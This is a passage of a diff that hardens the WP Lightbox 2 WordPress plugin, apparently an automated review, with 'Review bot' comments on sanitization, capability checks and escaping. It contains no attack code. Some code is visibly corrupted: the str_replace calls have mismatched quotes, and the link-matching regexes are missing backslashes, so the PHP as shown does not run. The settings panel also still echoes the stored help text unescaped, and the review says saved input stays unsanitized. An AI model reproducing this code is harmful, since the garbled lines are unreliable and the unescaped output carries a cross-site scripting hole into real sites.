+						},2500 );
+					}else{
+						jQuery('.saving_in_progress').css('display','none');
+						jQuery('.error_in_saving').css('display','inline-block');
+						jQuery('.error_massage').css('display','inline-block');
+						jQuery('.error_massage').html(date);
+
+						setTimeout( function() {
+							jQuery('#save_button_general').removeClass('padding_loading');
+							jQuery("#save_button_general").prop('disabled', false);
+						}, 5000 );
+					}
 				});
-				function generete_radio_input(radio_class){
-					jQuery('.'+radio_class).each(function(index, element) {
-                       jQuery(this).find('input[type=hidden]').val(jQuery(this).find('input[type=radio]:checked').val())
-                    });
-				}
-				function generete_checkbox(checkbox_class){
-					jQuery('.'+checkbox_class).each(function(index, element) {
-						if(jQuery(this).find('input[type=checkbox]').prop('checked'))
-                        	jQuery(this).find('input[type=hidden]').val(jQuery(this).find('input[type=checkbox]:checked').val());
-						else
-							jQuery(this).find('input[type=hidden]').val(0);
-                    });
-				}
+			});
+
+			function generete_checkbox(checkbox_class){
+				jQuery('.'+checkbox_class).each(function(index, element) {
+					if(jQuery(this).find('input[type=checkbox]').prop('checked'))
+						jQuery(this).find('input[type=hidden]').val(jQuery(this).find('input[type=checkbox]:checked').val());
+					else
+						jQuery(this).find('input[type=hidden]').val(0);
+				});
+			}

 		});

-        </script>
+	</script>

 		<?php
 	}
-
 }
-
-
- ?>
 No newline at end of file
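Review bot: save_parametrs() still stores stripslashes( $_POST[ $key ] ) directly with update_option(), so input is as unsanitized after this patch as before; add per-option sanitization in the foreach (sanitize_text_field() for jqlb_help_text, absint() with the same bounds the number inputs declare for jqlb_overlay_opacity, jqlb_margin_size and jqlb_resize_speed, and a 0/1 check for the checkbox mirrors) rather than relying on every consumer of these options to escape. On the display side, the removed loop $$key=esc_attr($value); already escaped every value before the old echo statements, so replacing it with extract( $initial_values ) plus esc_attr() at each output point keeps the settings page as it was rather than fixing anything; the bare // Allow comment above extract() should at least say that the keys come from the plugin's own defaults array, not from the request. The new ! current_user_can( 'manage_options' ) || ! wp_doing_ajax() guard is the real improvement, since a wp_ajax_ action runs for any logged-in user and the old handler checked only the nonce; consider replacing the two die('Authorization Problem') exits with wp_send_json_error() and a 403 status so the JavaScript caller can tell a rejection from the 'sax_normala' success string.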
--- a/wp-lightbox-2/includes/install_database.php
+++ b/wp-lightbox-2/includes/install_database.php
@@ -1,93 +1,90 @@
-<?php
+<?php

+class wp_lightbox2_database_params {

-
-class wp_lightbox2_database_params{
-
 	public $installed_options; // all standart_options
+	public $get_general_settings;
+	public $get_design_settings;
 	private $plugin_url;
-	public  $get_general_settings;
-	public  $get_design_settings;
-	function __construct(){
-
-		if(isset($params['plugin_url']))
-			$this->plugin_url=$params['plugin_url'];
-		else
-			$this->plugin_url=trailingslashit(dirname(plugins_url('',__FILE__)));
-		$general_settings=array(
-			'jqlb_overlay_opacity'=>'80',
-			'jqlb_help_text'=>'',
-			'jqlb_margin_size'=>0,
-			'jqlb_automate'=>1,
-			'jqlb_comments'=>1,
-			'jqlb_resize_on_demand'=>0,
-			'jqlb_show_download'=>0,
-			'jqlb_navbarOnTop'=>0,
-			'jqlb_resize_speed'=>400,
+
+	public function __construct( $params = array() ) {
+
+		if ( isset( $params[ 'plugin_url' ] ) ) {
+			$this->plugin_url = $params[ 'plugin_url' ];
+		} else {
+			$this->plugin_url = trailingslashit( dirname( plugins_url( '', __FILE__ ) ) );
+		}
+
+		$general_settings = array(
+			'jqlb_overlay_opacity'  => '80',
+			'jqlb_help_text'        => '',
+			'jqlb_margin_size'      => 0,
+			'jqlb_automate'         => 1,
+			'jqlb_comments'         => 1,
+			'jqlb_resize_on_demand' => 0,
+			'jqlb_show_download'    => 0,
+			'jqlb_navbarOnTop'      => 0,
+			'jqlb_resize_speed'     => 400,
 		);
-		foreach($general_settings as $key => $value){
-			if(!(get_option($key,12365498798465132148947984651)==12365498798465132148947984651)){
-				$general_settings[$key]=get_option($key);
+		foreach ( $general_settings as $key => $value ) {
+			if ( !(get_option( $key, 12365498798465132148947984651 ) == 12365498798465132148947984651) ) {
+				$general_settings[ $key ] = get_option( $key );
+			} else {
+				$general_settings[ $key ] = $value;
 			}
-			else{
-				$general_settings[$key]=$value;
-			}
-		}
-		 $this->get_general_settings=$general_settings;
-		 $locale = jqlb_get_locale();
-		 $folder='';
-		 switch($locale){
+		}
+		$this->get_general_settings = $general_settings;
+		$locale                     = jqlb_get_locale();
+		$folder                     = '';
+		switch ( $locale ) {
 			case 'cs_CZ':
-				$folder='cs_CZ/';
-			break;
+				$folder = 'cs_CZ/';
+				break;
 			case 'ru_RU':
-				$folder='ru_RU/';
-			break;
+				$folder = 'ru_RU/';
+				break;
 			case 'pl_PL':
-				$folder='pl_PL/';
-			break;
+				$folder = 'pl_PL/';
+				break;
 			case 'he_IL':
-				$folder='he_IL/';
-			break;
+				$folder = 'he_IL/';
+				break;
 		}

 		// Note: Deprecated 3.0.5+
-		$design_settings=array(
-			'jqlb_overlay_opacity'=>'80',
-			'jqlb_overlay_color'=>'#000000',
-			'jqlb_overlay_close'=>'1',
-			'jqlb_border_width'=>'10',
-			'jqlb_border_color'=>'#ffffff',
-			'jqlb_border_radius'=>'0',
-			'jqlb_image_info_background_transparency'=>'100',
-			'jqlb_image_info_bg_color'=>'#ffffff',
-			'jqlb_image_info_text_color'=>'#000000',
-			'jqlb_image_info_text_fontsize'=>'10',
-			'jqlb_show_text_for_image'=>'1',
-			'jqlb_next_image_title'=> __('next image', 'jqlb'),
-			'jqlb_previous_image_title'=>__('previous image', 'jqlb'),
-			'jqlb_next_button_image'=>$this->plugin_url.'styles/images/'.$folder.'next.gif',
-			'jqlb_previous_button_image'=>$this->plugin_url.'styles/images/'.$folder.'prev.gif',
-			'jqlb_maximum_width'=>'',
-			'jqlb_maximum_height'=>'',
-			'jqlb_show_close_button'=>'1',
-			'jqlb_close_image_title'=>__('close image gallery', 'jqlb'),
-			'jqlb_close_image_max_heght'=>'22',
-			'jqlb_image_for_close_lightbox'=>$this->plugin_url.'styles/images/'.$folder.'closelabel.gif',
-			'jqlb_keyboard_navigation'=>'1',
-			'jqlb_popup_size_fix'=>'0',
-		);
-		foreach($design_settings as $key => $value){
-			if(!(get_option($key,12365498798465132148947984651)==12365498798465132148947984651)){
-				$design_settings[$key]=get_option($key);
+		$design_settings = array(
+			'jqlb_overlay_opacity'                    => '80',
+			'jqlb_overlay_color'                      => '#000000',
+			'jqlb_overlay_close'                      => '1',
+			'jqlb_border_width'                       => '10',
+			'jqlb_border_color'                       => '#ffffff',
+			'jqlb_border_radius'                      => '0',
+			'jqlb_image_info_background_transparency' => '100',
+			'jqlb_image_info_bg_color'                => '#ffffff',
+			'jqlb_image_info_text_color'              => '#000000',
+			'jqlb_image_info_text_fontsize'           => '10',
+			'jqlb_show_text_for_image'                => '1',
+			'jqlb_next_image_title'                   => __( 'next image', 'jqlb' ),
+			'jqlb_previous_image_title'               => __( 'previous image', 'jqlb' ),
+			'jqlb_next_button_image'                  => $this->plugin_url . 'styles/images/' . $folder . 'next.gif',
+			'jqlb_previous_button_image'              => $this->plugin_url . 'styles/images/' . $folder . 'prev.gif',
+			'jqlb_maximum_width'                      => '',
+			'jqlb_maximum_height'                     => '',
+			'jqlb_show_close_button'                  => '1',
+			'jqlb_close_image_title'                  => __( 'close image gallery', 'jqlb' ),
+			'jqlb_close_image_max_heght'              => '22',
+			'jqlb_image_for_close_lightbox'           => $this->plugin_url . 'styles/images/' . $folder . 'closelabel.gif',
+			'jqlb_keyboard_navigation'                => '1',
+			'jqlb_popup_size_fix'                     => '0',
+		);
+
+		foreach ( $design_settings as $key => $value ) {
+			if ( !(get_option( $key, 12365498798465132148947984651 ) == 12365498798465132148947984651) ) {
+				$design_settings[ $key ] = get_option( $key );
+			} else {
+				$design_settings[ $key ] = $value;
 			}
-			else{
-				$design_settings[$key]=$value;
-			}
-		}
-		  $this->get_design_settings=$design_settings;
-
+		}
+		$this->get_design_settings = $design_settings;
 	}
-
-
-}
 No newline at end of file
+}
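Review bot: the `get_option( $key, 12365498798465132148947984651 )` sentinel test kept in both `foreach` loops is fragile: the literal exceeds PHP_INT_MAX, so it silently becomes a float, and only the loose `==` comparison makes the check work. Since `$value` already holds the default, each loop can collapse to `$general_settings[ $key ] = get_option( $key, $value );` (and likewise for `$design_settings`), dropping the sentinel and the `else` branch. The `$params = array()` default on the constructor is a genuine fix; the old `function __construct()` read `$params` without ever defining it.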
--- a/wp-lightbox-2/wp-lightbox-2.php
+++ b/wp-lightbox-2/wp-lightbox-2.php
@@ -1,15 +1,15 @@
 <?php
 /**
  * Plugin Name: WP Lightbox 2
- * Plugin URI:  http://wpdevart.com/wordpress-lightbox-plugin
+ * Plugin URI:  https://wpdevart.com/wordpress-lightbox-plugin
  * Description: WP Lightbox 2 adds stunning lightbox effects to images and galleries on your WordPress site.
- * Version:     3.0.6.8
+ * Version:     3.0.7
  * Author:      Syed Balkhi
- * Author URI:  http://syedbalkhi.com
+ * Author URI:  https://syedbalkhi.com
  * License:     GNU General Public License, v2 (or newer)
- * License URI: http://www.gnu.org/licenses/old-licenses/gpl-2.0.html
+ * License URI: https://www.gnu.org/licenses/old-licenses/gpl-2.0.html
  */
-/*  Copyright 2015 Syed Balkhi
+/*  Copyright 2015 Syed Balkhi

     This program is free software; you can redistribute it and/or modify
     it under the terms of the GNU General Public License as published by
@@ -26,152 +26,150 @@
 */

 add_action( 'plugins_loaded', 'jqlb_init' );
+
 function jqlb_init() {
-	if(!defined('ULFBEN_DONATE_URL')){
-		define('ULFBEN_DONATE_URL', 'http://onlinewebapplication.com/');
+
+	if ( ! defined( 'JQLB_SCRIPT' ) ) {
+		define('JQLB_SCRIPT', 'js/dist/wp-lightbox-2.min.js');
 	}

-	define('JQLB_SCRIPT', 'js/dist/wp-lightbox-2.min.js');
-	load_plugin_textdomain('jqlb', false, dirname( plugin_basename( __FILE__ ) ) . '/I18n/');
+	load_plugin_textdomain( 'jqlb', false, dirname( plugin_basename( __FILE__ ) ) . '/I18n/' );
+
 	add_action('admin_init', 'jqlb_register_settings');
-	//add_action('admin_menu', 'jqlb_register_menu_item');
-	add_action('wp_enqueue_scripts', 'jqlb_css');
+	add_action('wp_enqueue_scripts', 'jqlb_css');
 	add_action('wp_enqueue_scripts', 'jqlb_js');
-	//add_filter('plugin_row_meta', 	'jqlb_set_plugin_meta', 2, 10);
+
 	add_filter('the_content', 'jqlb_autoexpand_rel_wlightbox', 99);
-	if(get_option('jqlb_comments') == 1){
+
+	if ( 1 === (int) get_option('jqlb_comments') ) {
 		remove_filter('pre_comment_content', 'wp_rel_nofollow');
 		add_filter('comment_text', 'jqlb_lightbox_comment', 99);
 	}
 }

-function jqlb_set_plugin_meta( $links, $file ) { // Add a link to this plugin's settings page
-	static $this_plugin;
-	if(!$this_plugin) $this_plugin = plugin_basename(__FILE__);
-	if($file == $this_plugin) {
-		$settings_link = '<a href="options-general.php?page=jquery-lightbox-options">'.__('Settings', 'jqlb').'</a>';
-		array_unshift($links, $settings_link);
-	}
-	return $links;
-}
-function jqlb_add_admin_footer(){ //shows some plugin info in the footer of the config screen.
-	$plugin_data = get_plugin_data(__FILE__);
-
-}
-function jqlb_register_settings(){
-	register_setting( 'jqlb-settings-group', 'jqlb_automate', 'jqlb_bool_intval');
-	register_setting( 'jqlb-settings-group', 'jqlb_comments', 'jqlb_bool_intval');
-	register_setting( 'jqlb-settings-group', 'jqlb_resize_on_demand', 'jqlb_bool_intval');
-	register_setting( 'jqlb-settings-group', 'jqlb_show_download', 'jqlb_bool_intval');
-	register_setting( 'jqlb-settings-group', 'jqlb_navbarOnTop', 'jqlb_bool_intval');
-	register_setting( 'jqlb-settings-group', 'jqlb_margin_size', 'floatval');
-	register_setting( 'jqlb-settings-group', 'jqlb_resize_speed', 'jqlb_pos_intval');
-	register_setting( 'jqlb-settings-group', 'jqlb_help_text');
-
-
-	//register_setting( 'jqlb-settings-group', 'jqlb_follow_scroll', 'jqlb_bool_intval');
-	add_option('jqlb_help_text', '');
-
-	add_option('jqlb_automate', 1); //default is to auto-lightbox.
-	add_option('jqlb_comments', 1);
-	add_option('jqlb_resize_on_demand', 0);
-	add_option('jqlb_show_download', 0);
-	add_option('jqlb_navbarOnTop', 0);
-	add_option('jqlb_resize_speed', 400);
-	//add_option('jqlb_follow_scroll', 0);
+function jqlb_register_settings() {
+	register_setting( 'jqlb-settings-group', 'jqlb_automate',         'jqlb_bool_intval' );
+	register_setting( 'jqlb-settings-group', 'jqlb_comments',         'jqlb_bool_intval' );
+	register_setting( 'jqlb-settings-group', 'jqlb_resize_on_demand', 'jqlb_bool_intval' );
+	register_setting( 'jqlb-settings-group', 'jqlb_show_download',    'jqlb_bool_intval' );
+	register_setting( 'jqlb-settings-group', 'jqlb_navbarOnTop',      'jqlb_bool_intval' );
+	register_setting( 'jqlb-settings-group', 'jqlb_resize_speed',     'jqlb_pos_intval' );
+	register_setting( 'jqlb-settings-group', 'jqlb_margin_size',      'floatval' );
+	register_setting( 'jqlb-settings-group', 'jqlb_help_text',        'jplb_help_kses' );
+
+	add_option( 'jqlb_automate', 1 );
+	add_option( 'jqlb_comments', 1 );
+	add_option( 'jqlb_resize_on_demand', 0 );
+	add_option( 'jqlb_show_download', 0 );
+	add_option( 'jqlb_margin_size', 0 );
+	add_option( 'jqlb_navbarOnTop', 0 );
+	add_option( 'jqlb_resize_speed', 400 );
+	add_option( 'jqlb_help_text', '' );
 }
-function jqlb_register_menu_item() {
+function jqlb_register_menu_item() {
 	add_options_page('WP Lightbox Options', 'WP Lightbox 2', 'manage_options', 'jquery-lightbox-options', 'jqlb_options_panel');
 }
-function jqlb_get_locale(){
-	//$lang_locales and ICL_LANGUAGE_CODE are defined in the WPML plugin (http://wpml.org/)
+function jqlb_get_locale() {
+	//$lang_locales and ICL_LANGUAGE_CODE are defined in the WPML plugin (https://wpml.org/)
 	global $lang_locales;
-	if (defined('ICL_LANGUAGE_CODE') && isset($lang_locales[ICL_LANGUAGE_CODE])){
+
+	if (defined('ICL_LANGUAGE_CODE') && isset($lang_locales[ICL_LANGUAGE_CODE])) {
 		$locale = $lang_locales[ICL_LANGUAGE_CODE];
 	} else {
 		$locale = get_locale();
 	}
+
 	return $locale;
 }
-function jqlb_css(){
-	if(is_admin() || is_feed()){return;}
-	$locale = jqlb_get_locale();
-	$fileName = "lightbox.min.{$locale}.css";
-	$path = plugin_dir_path(__FILE__)."styles/{$fileName}";
+function jqlb_css() {
+	if ( is_admin() || is_feed() || wp_doing_ajax() ) {
+		return;
+	}
+
+	$locale   = jqlb_get_locale();
+	$fileName = "lightbox.min.{$locale}.css";
+	$path     = plugin_dir_path(__FILE__) . "styles/{$fileName}";

-	if(!is_readable($path)){
+	if ( ! is_readable( $path ) ) {
 		$fileName = 'lightbox.min.css';
 	}
-	wp_enqueue_style('wp-lightbox-2.min.css', plugin_dir_url(__FILE__).'styles/'.$fileName, false, '1.3.4');
-	// add custom (dinamic) styles for wp lightbox 2
-	?>

-	  <?php
+	wp_enqueue_style('wp-lightbox-2.min.css', plugin_dir_url(__FILE__) . 'styles/' . $fileName, false, '1.3.4');
 }
-function jqlb_js() {
-	if(is_admin() || is_feed()){return;}
-	wp_enqueue_script('jquery', '', array(), '1.7.1', true);
+function jqlb_js() {
+	if ( is_admin() || is_feed() || wp_doing_ajax() ) {
+		return;
+	}
+
+	wp_enqueue_script('jquery', '', array(), '1.7.1', true);
 	wp_enqueue_script('wp-jquery-lightbox', plugins_url(JQLB_SCRIPT, __FILE__ ),  Array('jquery'), '1.3.4.1', true);
+
 	global $wp_lightbox_2;
 	$wp_lightbox_2->parametrs;

-	$parametrs_array=array(
-		'fitToScreen' => get_option('jqlb_resize_on_demand'),
-		'resizeSpeed' => get_option('jqlb_resize_speed'),
-		'displayDownloadLink' => get_option('jqlb_show_download'),
-		'navbarOnTop' => get_option('jqlb_navbarOnTop'),
-		'loopImages' => get_option('jqlb_loopImages'),
-		'resizeCenter' => get_option('jqlb_resizeCenter'),
-		'marginSize' => get_option('jqlb_margin_size'),
-		'linkTarget' => get_option('jqlb_link_target'),
-		'help' => __(get_option('jqlb_help_text'), 'jqlb'),
-		'prevLinkTitle' => $wp_lightbox_2->parametrs->get_design_settings['jqlb_previous_image_title'],
-		'nextLinkTitle' => $wp_lightbox_2->parametrs->get_design_settings['jqlb_next_image_title'],
-		'prevLinkText' =>  __('« Previous', 'jqlb'),
-		'nextLinkText' => __('Next »', 'jqlb'),
-		'closeTitle' => $wp_lightbox_2->parametrs->get_design_settings['jqlb_close_image_title'],
-		'image' => __('Image ', 'jqlb'),
-		'of' => __(' of ', 'jqlb'),
-		'download' => __('Download', 'jqlb')
+	$parametrs_array = array(
+		'fitToScreen'         => (int) get_option('jqlb_resize_on_demand'),
+		'resizeSpeed'         => (int) get_option('jqlb_resize_speed'),
+		'displayDownloadLink' => (int) get_option('jqlb_show_download'),
+		'navbarOnTop'         => (int) get_option('jqlb_navbarOnTop'),
+		'loopImages'          => (int) get_option('jqlb_loopImages'),
+		'resizeCenter'        => (int) get_option('jqlb_resizeCenter'),
+		'marginSize'          => (int) get_option('jqlb_margin_size'),
+		'linkTarget'          => esc_js( get_option('jqlb_link_target') ),
+		'help'                => esc_js( get_option('jqlb_help_text') ),
+		'prevLinkTitle'       => esc_js( $wp_lightbox_2->parametrs->get_design_settings['jqlb_previous_image_title'] ),
+		'nextLinkTitle'       => esc_js( $wp_lightbox_2->parametrs->get_design_settings['jqlb_next_image_title'] ),
+		'closeTitle'          => esc_js( $wp_lightbox_2->parametrs->get_design_settings['jqlb_close_image_title'] ),
+		'prevLinkText'        => __( '« Previous', 'jqlb' ),
+		'nextLinkText'        => __( 'Next »', 'jqlb' ),
+		'image'               => __( 'Image ', 'jqlb' ),
+		'of'                  => __( ' of ', 'jqlb' ),
+		'download'            => __( 'Download', 'jqlb' )
 	);

-	foreach($wp_lightbox_2->parametrs->get_design_settings as $key =>$value){
-		$parametrs_array[$key]	=$value;
+	foreach ( $wp_lightbox_2->parametrs->get_design_settings as $key => $value ) {
+		$parametrs_array[ $key ] = $value;
 	}
-	wp_localize_script('wp-jquery-lightbox', 'JQLBSettings', $parametrs_array);
+
+	wp_localize_script(
+		'wp-jquery-lightbox',
+		'JQLBSettings',
+		$parametrs_array
+	);
 }

-function jqlb_lightbox_comment($comment){
+function jqlb_lightbox_comment( $comment = '' ) {
 	$comment = str_replace('rel='external nofollow'','', $comment);
 	$comment = str_replace('rel='nofollow'','', $comment);
 	$comment = str_replace('rel="external nofollow"','', $comment);
 	$comment = str_replace('rel="nofollow"','', $comment);
+
 	return jqlb_autoexpand_rel_wlightbox($comment);
 }

-function jqlb_autoexpand_rel_wlightbox($content) {
-	if(get_option('jqlb_automate') == 1){
-		global $post;
+function jqlb_autoexpand_rel_wlightbox( $content = '' ) {
+	if ( 1 === (int) get_option('jqlb_automate') ) {
+		global $post;
 		$id = ($post->ID) ? $post->ID : -1;
 		$content = jqlb_do_regexp($content, $id); //legacy regex function when images don't have rel tags
 		$content = wplbtwo_do_regexp($content, $id);
-	}
+	}
 	return $content;
 }
-function jqlb_apply_lightbox($content, $id = -1){
-	if(!isset($id) || $id === -1){
-		$id = time().rand(0, 32768);
+function jqlb_apply_lightbox($content, $id = -1) {
+	if(!isset($id) || $id === -1) {
+		$id = time() . wp_rand( 0, 32768 );
 	}
 	return jqlb_do_regexp($content, $id);
 }

 /* automatically insert rel="lightbox[nameofpost]" to every image with no manual work.
 	if there are already rel="lightbox[something]" attributes, they are not clobbered.
-	Michael Tyson, you are a regular expressions god! - http://atastypixel.com */
-function jqlb_do_regexp($content, $id){
-	$id = esc_attr($id);
+	Michael Tyson, you are a regular expressions god! - https://atastypixel.com */
+function jqlb_do_regexp($content, $id) {
 	$pattern = "/(<a(?![^>]*?rel=['"]lightbox.*)(?![^>]*?rel=.*)[^>]*?href=['"][^'"]+?.(?:bmp|gif|jpg|jpeg|png)?{0,1}S{0,}['"][^>]*)>/i";
-	$replacement = '$1 rel="lightbox['.$id.']">';
+	$replacement = '$1 rel="lightbox[' . esc_attr( $id ) . ']">';
+
 	return preg_replace($pattern, $replacement, $content);
 }

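Review bot: in `jqlb_js`, wrapping `get_option('jqlb_help_text')` and the other title strings in `esc_js()` before handing them to `wp_localize_script()` double-escapes them: `wp_localize_script` already runs each scalar through `html_entity_decode` and then JSON-encodes it, so the backslashes `esc_js()` adds reach the browser as literal characters. Pass the raw option values and let the JSON encoding handle the script context; what protects the stored value is the new `jplb_help_kses` sanitize callback registered for `jqlb_help_text`, and the DOM sink the front-end script uses for `help` still decides whether kses-allowed HTML is acceptable there. Separately, `$wp_lightbox_2->parametrs;` on its own line is a no-op statement and can be deleted.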
@@ -185,208 +183,210 @@
  *
  * @since 3.0.6.2
  */
-function wplbtwo_do_regexp($content, $id){
-	$id = esc_attr($id);
+function wplbtwo_do_regexp($content, $id) {
 	$pattern = "/(<a(?![^>]*?rel=['"]lightbox.*)[^>]*?href=['"][^'"]+?.(?:bmp|gif|jpg|jpeg|png)?{0,1}S{0,}['"][^>]*)(rel=['"])(.*?)>/i";
-	$replacement = '$1 $2lightbox['.$id.'] $3>';
+	$replacement = '$1 $2lightbox[' . esc_attr( $id ) . '] $3>';
+
 	return preg_replace($pattern, $replacement, $content);
 }

-function jqlb_bool_intval($v){
-	return $v == 1 ? '1' : '0';
+function jqlb_bool_intval( $v = 0 ) {
+	return ( 1 === (int) $v ) ? '1' : '0';
 }

-function jqlb_pos_intval($v){
+function jqlb_pos_intval($v) {
 	return abs(intval($v));
 }
-function jqlb_options_panel(){
-	if(!function_exists('current_user_can') || !current_user_can('manage_options')){
-			die(__('Cheatin’ uh?', 'jqlb'));
-	}
-	add_action('in_admin_footer', 'jqlb_add_admin_footer');
+
+function jplb_help_kses($t) {
+	return wp_kses_post($t);
+}
+
+function jqlb_options_panel() {
+
+	if ( ! function_exists( 'current_user_can' ) || ! current_user_can( 'manage_options' ) ) {
+		die(__('Cheatin’ uh?', 'jqlb'));
+	}
+
 	?>
-
+
 	<div class="wrap">
-	<h2>WP Lightbox 2</h2>
-	<?php include_once(plugin_dir_path(__FILE__).'about.php'); ?>
+	<h2>WP Lightbox 2</h2>
+	<?php include_once plugin_dir_path(__FILE__) . 'about.php'; ?>
 	<form method="post" action="options.php">
 		<table>
-		<?php settings_fields('jqlb-settings-group'); ?>
+			<?php settings_fields('jqlb-settings-group'); ?>
 			<tr valign="baseline" colspan="2">
 				<td colspan="">
-					<?php $check = get_option('jqlb_automate') ? ' checked="yes" ' : ''; ?>
-					<input type="checkbox" id="jqlb_automate" name="jqlb_automate" value="1" <?php echo $check; ?>/>
+					<input type="checkbox" id="jqlb_automate" name="jqlb_automate" value="1" <?php checked( (bool) get_option('jqlb_automate') ); ?> />
 					<label for="jqlb_automate" title="<?php _e('Let the plugin add necessary html to image links', 'jqlb') ?>"> <?php _e('Auto-lightbox image links', 'jqlb') ?></label>
 				</td>
 			</tr>
 			<tr valign="baseline" colspan="2">
 				<td colspan="2">
-					<?php $check = get_option('jqlb_comments') ? ' checked="yes" ' : ''; ?>
-					<input type="checkbox" id="jqlb_comments" name="jqlb_comments" value="1" <?php echo $check; ?>/>
-					<label for="jqlb_comments" title="<?php _e('Note: this will disable the nofollow-attribute of comment links, that otherwise interfere with the lightbox.', 'jqlb') ?>"> <?php _e('Enable lightbox in comments (disables <a href="http://codex.wordpress.org/Nofollow">the nofollow attribute!</a>)', 'jqlb') ?></label>
+					<input type="checkbox" id="jqlb_comments" name="jqlb_comments" value="1" <?php checked( (bool) get_option('jqlb_comments') ); ?> />
+					<label for="jqlb_comments" title="<?php _e('Note: this will disable the nofollow-attribute of comment links, that otherwise interfere with the lightbox.', 'jqlb') ?>"> <?php _e('Enable lightbox in comments (disables <a href="https://codex.wordpress.org/Nofollow">the nofollow attribute!</a>)', 'jqlb') ?></label>
 				</td>
 			</tr>
 			<tr valign="baseline" colspan="2">
 				<td>
-					<?php $check = get_option('jqlb_show_download') ? ' checked="yes" ' : ''; ?>
-					<input type="checkbox" id="jqlb_show_download" name="jqlb_show_download" value="1" <?php echo $check; ?> />
+					<input type="checkbox" id="jqlb_show_download" name="jqlb_show_download" value="1" <?php checked( (bool) get_option('jqlb_show_download') ); ?> />
 					<label for="jqlb_show_download"> <?php _e('Show download link', 'jqlb') ?> </label>
-			</td>
+				</td>
 				<td>
-				<?php $target = get_option('jqlb_link_target'); ?>
-				<label for="jqlb_link_target" title="<?php _e('_blank: open the image in a new window or tab
+					<label for="jqlb_link_target" title="<?php _e('_blank: open the image in a new window or tab
 _self: open the image in the same frame as it was clicked (default)
 _parent: open the image in the parent frameset
-_top: open the image in the full body of the window', 'jqlb') ?>"><?php _e('Target for download link:', 'jqlb'); ?></label>
-				<select id="jqlb_link_target" name="jqlb_link_target">
-					<option <?php if ('_blank' == $target)echo 'selected="selected"'; ?>>_blank</option>
-					<option <?php if ('_self' == $target)echo 'selected="selected"'; ?>>_self</option>
-					<option <?php if ('_top' == $target)echo 'selected="selected"'; ?>>_top</option>
-					<option <?php if ('_parent' == $target)echo 'selected="selected"'; ?>>_parent</option>
-				</select>
+_top: open the image in the full body of the window', 'jqlb') ?>"><?php _e('Target for download link:', 'jqlb'); ?></label>
+					<select id="jqlb_link_target" name="jqlb_link_target">
+						<option <?php selected( get_option('jqlb_link_target'), '_blank'  ); ?>>_blank</option>
+						<option <?php selected( get_option('jqlb_link_target'), '_self'   ); ?>>_self</option>
+						<option <?php selected( get_option('jqlb_link_target'), '_top'    ); ?>>_top</option>
+						<option <?php selected( get_option('jqlb_link_target'), '_parent' ); ?>>_parent</option>
+					</select>
+				</td>
+			</tr>
+			<tr valign="baseline" colspan="2">
+				<td colspan="2">
+					<input type="checkbox" id="jqlb_navbarOnTop" name="jqlb_navbarOnTop" value="1" <?php checked( (bool) get_option('jqlb_navbarOnTop') ); ?> />
+					<label for="jqlb_navbarOnTop">
+						<?php _e('Show image info on top', 'jqlb') ?>
+					</label>
+				</td>
+			</tr>
+			<tr valign="baseline" colspan="2">
+				<td>
+					<input type="checkbox" id="jqlb_resize_on_demand" name="jqlb_resize_on_demand" value="1" <?php checked( (bool) get_option('jqlb_resize_on_demand') ); ?> />
+					<label for="jqlb_resize_on_demand"><?php _e('Shrink large images to fit smaller screens', 'jqlb') ?></label>
+				</td>
+				<?php if ( get_option('jqlb_resize_on_demand') ) : ?>
+				<td>
+					<input type="text" id="jqlb_margin_size" name="jqlb_margin_size" value="<?php echo floatval(get_option('jqlb_margin_size')) ?>" size="3" />
+					<label for="jqlb_margin_size" title="<?php _e('Keep a distance between the image and the screen edges.', 'jqlb') ?>"><?php _e('Minimum margin to screen edge (default: 0)', 'jqlb') ?></label>
+				</td>
+				<?php endif; ?>
+			</tr>
+			<tr valign="baseline" colspan="2">
+				<td colspan="2">
+					<input type="text" id="jqlb_resize_speed" name="jqlb_resize_speed" value="<?php echo intval(get_option('jqlb_resize_speed')) ?>" size="3" />
+					<label for="jqlb_resize_speed"><?php _e('Animation duration (in milliseconds) ', 'jqlb') ?></label>
+				</td>
+			</tr>
+			<tr valign="baseline" colspan="2">
+				<td>
+					<input type="text" id="jqlb_help_text" name="jqlb_help_text" value="<?php echo get_option('jqlb_help_text'); ?>" size="30" />
+					<label for="jqlb_help_text"><?php _e('Help text (default: none) ', 'jqlb'); ?></label>
 				</td>
 			</tr>
-      <tr valign="baseline" colspan="2">
-        <td colspan="2">
-          <?php $check = get_option('jqlb_navbarOnTop') ? ' checked="yes" ' : ''; ?>
-          <input type="checkbox" id="jqlb_navbarOnTop" name="jqlb_navbarOnTop" value="1" <?php echo $check; ?> />
-          <label for="jqlb_navbarOnTop">
-            <?php _e('Show image info on top', 'jqlb') ?>
-          </label>
-        </td>
-      </tr>
-      <tr valign="baseline" colspan="2">
-			<td>
-				<?php $check = get_option('jqlb_resize_on_demand') ? ' checked="yes" ' : ''; ?>
-				<input type="checkbox" id="jqlb_resize_on_demand" name="jqlb_resize_on_demand" value="1" <?php echo $check; ?> />
-				<label for="jqlb_resize_on_demand"><?php _e('Shrink large images to fit smaller screens', 'jqlb') ?></label>
-			</td>
-			<?php IF($check != ''): ?>
-			<td>
-				<input type="text" id="jqlb_margin_size" name="jqlb_margin_size" value="<?php echo floatval(get_option('jqlb_margin_size')) ?>" size="3" />
-				<label for="jqlb_margin_size" title="<?php _e('Keep a distance between the image and the screen edges.', 'jqlb') ?>"><?php _e('Minimum margin to screen edge (default: 0)', 'jqlb') ?></label>
-			</td>
-			<?php ENDIF; ?>
-		</tr>
-		<tr valign="baseline" colspan="2">
-			<td colspan="2">
-				<input type="text" id="jqlb_resize_speed" name="jqlb_resize_speed" value="<?php echo intval(get_option('jqlb_resize_speed')) ?>" size="3" />
-				<label for="jqlb_resize_speed"><?php _e('Animation duration (in milliseconds) ', 'jqlb') ?></label>
-			</td>
-		</tr>
-		<tr valign="baseline" colspan="2">
-			<td>
-				<input type="text" id="jqlb_help_text" name="jqlb_help_text" value="<?php echo get_option('jqlb_help_text'); ?>" size="30" />
-				<label for="jqlb_help_text"><?php _e('Help text (default: none) ', 'jqlb'); ?></label>
-			</td>
-		</tr>
-		 </table>
-		<p style="font-size:xx-small;font-style:italic;"><?php _e('Browse images with your keyboard: Arrows or P(revious)/N(ext) and X/C/ESC for close.', 'jqlb'); ?></p>
-		<p class="submit">
-		  <input type="submit" name="Submit" value="<?php _e('Save Changes', 'jqlb') ?>" />
-		</p>
-	</form>
+			 </table>
+			<p style="font-size:xx-small;font-style:italic;"><?php _e('Browse images with your keyboard: Arrows or P(revious)/N(ext) and X/C/ESC for close.', 'jqlb'); ?></p>
+			<p class="submit">
+			  <input type="submit" name="Submit" value="<?php _e('Save Changes', 'jqlb') ?>" />
